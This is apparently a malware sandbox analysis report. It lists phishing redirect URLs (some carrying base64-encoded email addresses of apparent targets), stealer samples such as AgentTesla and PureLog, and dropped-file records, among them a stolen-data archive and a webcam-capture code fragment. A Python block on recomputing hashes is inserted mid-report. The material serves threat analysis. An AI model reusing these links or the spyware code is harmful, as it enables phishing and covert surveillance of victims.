GITHUBUS | https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc= | malicious | HTMLPhisher | 140.82.121.4
GITHUBUS | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29t | malicious | HTMLPhisher | 140.82.121.3
GITHUBUS | https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5s | malicious | HTMLPhisher | 140.82.121.3
GITHUBUS | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20= | malicious | HTMLPhisher | 140.82.121.4
GITHUBUS | https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT | malicious | HTMLPhisher | 140.82.121.4
GITHUBUS | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//dolar2go.com/new/auth//klqsxqvkkosgj/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ== | malicious | HTMLPhisher | 140.82.121.4
GITHUBUS | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//littlelassies.com/ejk/xlpd//j40gstqcualqm/%2F/ZG9uYWxkLmRvbm92YW5AbWJ1LmVkdQ== | malicious | HTMLPhisher | 140.82.121.3
GITHUBUS | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDXjPPos73WSprAyRZ-2Fe35OyRzQCObx6m2J-2BawNrx1Z79t5DvqpoKU1sx90SQ9s1BFTlDy-2BRnvEYaoAECBzgLGytfTSN7FznTwccbM6qJLuUBwrJkCmvLgd8uOOPtKHOCiy6m2fDQJxPXI5uFtOzDGRc-3DScHx_QDM3TkIx9p0DtDeeEp0Z8-2FPcqv0Tvq51yChjKFu-2FB2Toc0JH3IfEt8ayxh9hRhaZappsCk3uGkbJsKvBDyCVHk27C5SeHf-2FrB5syLp7eES4tqFfaea5oHTg4hKblIVwbNxKeRdk6V97FA4a8WTc0qktZ4kjgtBGcuL6n47Dqs5kNCe1kyO9oqq2u-2BdPhrTaYy2E3Tb1wbzdQ4NKkm-2BJWAw-3D-3D | malicious | HTMLPhisher | 140.82.121.3
GITHUBUS | https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4 | malicious | HTMLPhisher | 140.82.121.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Products inquiryJULY ORDER2024.PDF.exe | malicious | PureLog Stealer, RedLine | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
3b5074b1b5d032e5620f69f9f700ff0e | http://ferjex.com | malicious | Unknown | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
3b5074b1b5d032e5620f69f9f700ff0e | Service Desk - Please verify your Account!.eml | malicious | HTMLPhisher | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
3b5074b1b5d032e5620f69f9f700ff0e | q86onx3LvU.exe | malicious | PureLog Stealer | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
3b5074b1b5d032e5620f69f9f700ff0e | 6Ek4nfs2y1.exe | malicious | PhoenixKeylogger, PureLog Stealer | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
3b5074b1b5d032e5620f69f9f700ff0e | q86onx3LvU.exe | malicious | PureLog Stealer | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
3b5074b1b5d032e5620f69f9f700ff0e | tgBNtoWqIp.exe | malicious | AgentTesla, PureLog Stealer | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
3b5074b1b5d032e5620f69f9f700ff0e | 19808bS58f.exe | malicious | AgentTesla | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exe | malicious | AgentTesla | 140.82.121.3, 185.199.109.133, 185.199.110.133, 104.16.123.96
                                      No context
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcfae260a, page size 16384, DirtyShutdown, Windows version 10.0
                                      Category:dropped
                                      Size (bytes):1310720
                                      Entropy (8bit):0.7899932745423197
                                      Encrypted:false
                                      SSDEEP:1536:DSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:DazaPvgurTd42UgSii
                                      MD5:03B48D128A5E30BA2CA071F33412BD77
                                      SHA1:2F70416346E1B4661BA7FB14558D27F3C36555A6
                                      SHA-256:2A8933DB131D865F640D7F6565DC4853BD6D3948C100F0D9F7DCCDC3BD8B3D4E
                                      SHA-512:CD5BB1D176A9DA8E2CC68CFC6D1592CC49960E4A7B7EF1E3211430098CFEA3CBD3BAAB088226ECD741B550872EBD6FA5FFE481E040221A0B35EA23D60CD9146A
                                      Malicious:false
                                      Preview:.&.... ...............X\...;...{......................0.`.....42...{5......|w.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................aN......|..................z/.......|w..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32790
                                      Entropy (8bit):5.057332133095993
                                      Encrypted:false
                                      SSDEEP:768:nLbV3IpNBQkj2Uh4iUx1frRJv5FPvlOZhxYardF/JQOdB8tAHkLNZzNKe1MlYo7h:nLbV3CNBQkj2Uh4iUx1flJnPvlOCqdRF
                                      MD5:79DCA888D6C99E400EC9E670CDBC3C7E
                                      SHA1:6C4C03035A8992B475C61E4625C72262D8441A09
                                      SHA-256:46340E6846270DB1D405C9F294CA64D027FD629E139BCED5176B8BF7139A5908
                                      SHA-512:614DA471CF8B32B14BDBADD40BB2B1CCC1258C0DA9C8AADC58A5A4C707A90A00D88255956CDDE65314D63271F00B0AEBB063F4BF69B753949F90208C3F6A8C40
                                      Malicious:false
                                      Preview:PSMODULECACHE.1...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Preview:@...e...........................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                      Category:modified
                                      Size (bytes):664330
                                      Entropy (8bit):7.997884159883886
                                      Encrypted:true
                                      SSDEEP:12288:tHDXpH8NIPE6Tp5JuK2DpveYOw95E7lJh4sgktaI6u549J1CAKVGFAGF:tjXpP/PJkN7z95EZXftaI6u549LC0V
                                      MD5:89E73B979FCE5791EE3E4EB209B016EC
                                      SHA1:C62576AB28B23E93ED5F804742847CC631305B90
                                      SHA-256:D9AA0A6F4293207A3A2E44B5F99E51DB18A39916FA3E053CC75EEE0441D5F297
                                      SHA-512:5BBA1198B90063EC49072F08814C1BAECDB94190ECB33B4367228A52A87A9FC670B7162EADDFEE26845252D9CABD6B84C5AB54D4CA634C3F4BA73F1631C8FCA7
                                      Malicious:false
                                      Preview:PK.........j.X............<...US-(user-PC)-(2024-07-03)-(UTC-5)\clipboard_history.txtPK.........j.XO..%........3...US-(user-PC)-(2024-07-03)-(UTC-5)\discord.json.+....PK.........j.Xb.7.9...@...5...US-(user-PC)-(2024-07-03)-(UTC-5)\productkey.txt.....!.!...A.HG.y..&@.;..C..1PF.......!.(..`.....M.x....PK.........j.X."}......J..5...US-(user-PC)-(2024-07-03)-(UTC-5)\screenshot.pngl..PS[..}.@.JG@z......wD.....F)RBM..T.(....R.......R.......$..{..o.a....a=.....I..4;.r.......m......`:C;.d......[3C.|Hp.......T....=...g....._O.A=.......5c.[!.,....>.0.:..u.K........t.+.T.......kT.CD..9?._..tG.sB.K;..........9z.cb88g.ff#}Z.F../U.}.%.e...5Wg....]O...+i..M{4...o.Y.R(N..p....~...>.+7{73H5b.....J...Yt'q.......*.......;.u.....q.P..`.s......y.Z..!.u..._..\.K...T"L4.g......|.....s.....L....,.]N)z>.....3..g.a......#C..oc+.....^...i.?......~y:_...S....+4Ku..E....n......9.......c=;....W._G..rX..:s.8..y...jU.7.u.. a9<..}...{.|Y.0 .J*.......MO=..0...R...;
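The per-file metrics in these dropped-file records (Size, Entropy (8bit), the MD5/SHA-1/SHA-256/SHA-512 digests, and the Encrypted flag) can be re-derived offline from the file bytes, which is the usual way to confirm that a sample pulled from a sandbox or a host matches the record. The script below is an added example, not Joe Sandbox code. It assumes that the Encrypted field is an entropy heuristic (in the records above it tracks the entropy column: 5.06 is false, 7.998 is true) and uses a hypothetical cut-off of 7.5 bits per byte; the sample inputs are constructed: 61 NUL bytes plus three distinct other bytes reproduce the 64-byte record's reported entropy of 0.34726597513537405 exactly, and a stored ZIP with the entry names from the preview above, whose "screenshot.png" is a flat byte pattern standing in for real PNG data, stands in for the 664330-byte archive. The caveat it demonstrates is that Encrypted:true on a stored (uncompressed) ZIP is driven by the already-compressed image inside it, not by a ZIP password; the ZIP general-purpose flag bit 0 is what distinguishes the two.

```python
"""Re-derive sandbox dropped-file metrics and check real ZIP encryption.

Added example; not Joe Sandbox code. The entropy threshold and the
sample bytes are assumptions / constructed inputs, labelled below.
"""
import hashlib
import io
import math
import zipfile
from collections import Counter

# Assumption: the report's "Encrypted" flag is derived from entropy alone.
# 7.5 bits/byte is a hypothetical cut-off that separates the report's
# 5.06 (PSMODULECACHE, false) from its 7.998 (ZIP, true).
ENCRYPTED_ENTROPY_THRESHOLD = 7.5


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 .. 8.0 ('Entropy (8bit)')."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = Counter(data)
    h = -sum((c / n) * math.log2(c / n) for c in counts.values())
    return max(0.0, h)  # a constant buffer would otherwise yield -0.0


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the same field names as the report."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def looks_encrypted(entropy: float) -> bool:
    """Entropy-only heuristic (assumption, see threshold above)."""
    return entropy > ENCRYPTED_ENTROPY_THRESHOLD


def describe(data: bytes) -> dict:
    """One record in the layout of the report's dropped-file entries."""
    h = shannon_entropy(data)
    record = {"Size (bytes)": len(data), "Entropy (8bit)": h, "Encrypted": looks_encrypted(h)}
    record.update(digests(data))
    return record


def zip_is_password_protected(data: bytes) -> bool:
    """True only if an entry sets the ZIP 'encrypted' general-purpose bit (bit 0)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(info.flag_bits & 0x1 for info in zf.infolist())


# Constructed stand-in for the 64-byte dropped file: 61 NULs plus three
# distinct bytes ('@', 'e' and one control byte) give its reported entropy.
SMALL_SAMPLE = b"@\x00\x00\x00e\x01" + b"\x00" * 58


def build_stealer_like_zip() -> bytes:
    """Stored ZIP using the entry names from the report's preview; the
    'screenshot.png' body is a constructed high-entropy byte pattern."""
    prefix = "US-(user-PC)-(2024-07-03)-(UTC-5)/"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr(prefix + "clipboard_history.txt", b"")
        zf.writestr(prefix + "discord.json", b"{}")
        zf.writestr(prefix + "productkey.txt", b"XXXXX-XXXXX-XXXXX-XXXXX-XXXXX")
        zf.writestr(prefix + "screenshot.png", bytes(range(256)) * 256)
    return buf.getvalue()


if __name__ == "__main__":
    archive = build_stealer_like_zip()
    for label, blob in (("64-byte file", SMALL_SAMPLE), ("stored zip", archive)):
        print(label, describe(blob))
    # The heuristic says "Encrypted", the ZIP flag bits say "no password".
    print("zip password-protected:", zip_is_password_protected(archive))
```

Run it against the real dropped file to compare the digests with the record; a mismatch means the artifact on disk is not the one the sandbox saw. For archives, trust `zip_is_password_protected` over the Encrypted column when deciding whether a stolen-data bundle can be opened directly.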
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Jul 3 18:33:18 2024, 1st section name ".debug$S"
                                      Category:modified
                                      Size (bytes):1340
                                      Entropy (8bit):4.028504728130593
                                      Encrypted:false
                                      SSDEEP:24:H2K9o0P5PSacy/ZHMwKOZmNeI+ycuZhNQakScPNnqSed:E0P5zciZzKOZmw1ulQa3MqS+
                                      MD5:94F082876931CD6654CE048CE260295F
                                      SHA1:3E290F35973E191115FE8823BBA6AFA5A689FD7C
                                      SHA-256:F23089FC6872C728E99ABDF3C051733CC77B36D76A147F64B5BCEE3FE5B5CCC3
                                      SHA-512:5FD34DEE11725015F6B2D3D25789BDC13A835C10771143CB79EDFD9749D3D2BBE225517F964CD876EDFAEB15B4C8F8EAA939BABB0BA3EFEAA7B8FB92E29ADB88
                                      Malicious:false
                                      Preview:L...n..f.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........X....c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP................Q.G.....Y5tC...........7.......C:\Users\user~1\AppData\Local\Temp\RESA945.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.e.k.o.w.n.h.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):1.5
                                      Encrypted:false
                                      SSDEEP:3:s:s
                                      MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                      SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                      SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                      SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                      Malicious:false
                                      Preview:null
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.103065463071312
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryeak7YnqqcPN5Dlq5J:+RI+ycuZhNQakScPNnqX
                                      MD5:A651D29247E2D3DCD4B507593574438C
                                      SHA1:491B541F41DDC7FD5F82957344927DE2559ABA29
                                      SHA-256:E00A9FDDA601CD5D9AB5151D3E693019675A2BFC503463B44F75891130E84AD6
                                      SHA-512:4E8325539CF7C8E6F307644275C6189DA414BE70C4CBD156C3051ED28CC38286AF3AC0BB6802A8D3C209C3F4630A05D24300C13571D1FF06D2FD325720030452
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.e.k.o.w.n.h.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.e.k.o.w.n.h.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text
                                      Category:dropped
                                      Size (bytes):5043
                                      Entropy (8bit):4.2500942903723855
                                      Encrypted:false
                                      SSDEEP:96:JL4W84Ji4AnzvN0OpVDUNKMiNjHJ4OY492VXyNbEqbE:OqHeVRV4oMiNjHJu/VCNIr
                                      MD5:2A829317F65FEA84EB85CB2376FA9E21
                                      SHA1:2F223EA8738F9989385E93B9C8CF0E8FC5E30700
                                      SHA-256:F99C46F447010A438586651FCDF9068394926247BF7656980FEE066B2069FE8F
                                      SHA-512:A438C35327297431DF19FE50683619F78EA0245BB8D3AA7553C376C365B927747D8CB8343FC2CFB4DE884DAD4EB6166589AFC98EBA385137BB3405998838ACE0
                                      Malicious:false
                                      Preview:. using System; . using System.Collections.Generic; . using System.Text; . using System.Collections; . using System.Runtime.InteropServices; . using System.ComponentModel; . using System.Data; . using System.Drawing; . using System.Windows.Forms; . . namespace WebCamLib . { . public class Device . { . private const short WM_CAP = 0x400; . private const int WM_CAP_DRIVER_CONNECT = 0x40a; . private const int WM_CAP_DRIVER_DISCONNECT = 0x40b; . private const int WM_CAP_EDIT_COPY = 0x41e; . private const int WM_CAP_SET_PREVIEW = 0x432; . private const int WM_CAP_SET_OVERLAY = 0x433; . private const int WM_CAP_SET_PREVIEWRATE = 0x434; . private const int WM_CAP_SET_SCALE = 0x435; . private const int WS_CHILD = 0x40000000; . private const int WS_VISIBLE = 0x10000000; . . [DllImport("avicap32.dll")] . protect
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (717), with no line terminators
                                      Category:dropped
                                      Size (bytes):720
                                      Entropy (8bit):5.354325474817099
                                      Encrypted:false
                                      SSDEEP:12:p37Lvkmb6KOkrk+ik9k2Lkqe1xhZP5uWZEJZP5j:V3ka6KOk9k+kqeDP5vEvP5j
                                      MD5:1203F65DC3662C767643C3AB68504A0D
                                      SHA1:2ED95F565384E40B63A44E5B8AA0E0C6F681D10C
                                      SHA-256:A763BDB206A15884F757F72715C1102DA8687058266202545F60D9D91E6A03C2
                                      SHA-512:C71B0BAA07079AF00F63CB84E217D061DDADDA940B5E9D5164D54756F43748C34D83E52E080B3939CD9D11F5B9DF51F0084E58C0619A0A52B49587D3910186BD
                                      Malicious:true
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /out:"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.0.cs"
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):5632
                                      Entropy (8bit):4.168554394940876
                                      Encrypted:false
                                      SSDEEP:96:iNvaPdSdn2OlGYPdHCHkVM2oQVK6zMFXmuK:iNvaFAcYPdH0kVM4VK6zMM
                                      MD5:4F782C3B153429353F8592234915B07B
                                      SHA1:DF0FCAE9DB36C38F0C373A8BEB2D35D9ED910867
                                      SHA-256:894022D00948D22C39173567E7C45CD8A6B5E387CFDBD0AA579AAF76E3ED3140
                                      SHA-512:C24FE2A45FAB3AEBFD280A0E94A8B0BA94BC306FACB6A77F790D62981B0018B14DF834558B66733D1B5AE0281C271C4DF94F101D76CD712F83F9A3A604BA0BCA
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..f...........!................>-... ...@....... ....................................@..................................,..K....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ -......H.......\"..............................................................:.(......}....*..{....*"..}....*..{....*"..}....*..(....*....0...........{....(........ ...P......(....}.....{.... .....{..........(.....1[.{.... 5..........(....&.{.... 4....B......(....&.{.... 2..........(....&.{..........(....&*..0..!.........o.....o.....o.......(....(....*f.{.... ...........(....&*..{.... .....{..........(....&.{....(....&*...0..}.......r...p.do.....r...p.do.......+@....d...d(....,+.s
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (803), with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):1224
                                      Entropy (8bit):5.40995336721713
                                      Encrypted:false
                                      SSDEEP:24:KwId3ka6KOk9k+kqeDP5vEvP5CKax5DqBVKVrdFAMBJTH:xkka6Nk9k+kqeDP5vEvP5CK2DcVKdBJj
                                      MD5:67F097F158D781971A623CDE7A1605E6
                                      SHA1:0817A39A745C1D6302260E4373BD1726C6BDADC4
                                      SHA-256:59CAF5564CF6BC0C4D484CC6B611A729A228F3D9F1B06CC91585AFA1A8E1DAE7
                                      SHA-512:95D60F3334CEFEAB01DD61D07F726F7C36DE028235C4490399ABE871AFD904EA48D3119A30BE2A20F5851910978C835C568FA0E4E49310F44B055B29D5D729CC
                                      Malicious:false
                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /out:"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET F
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):1.5
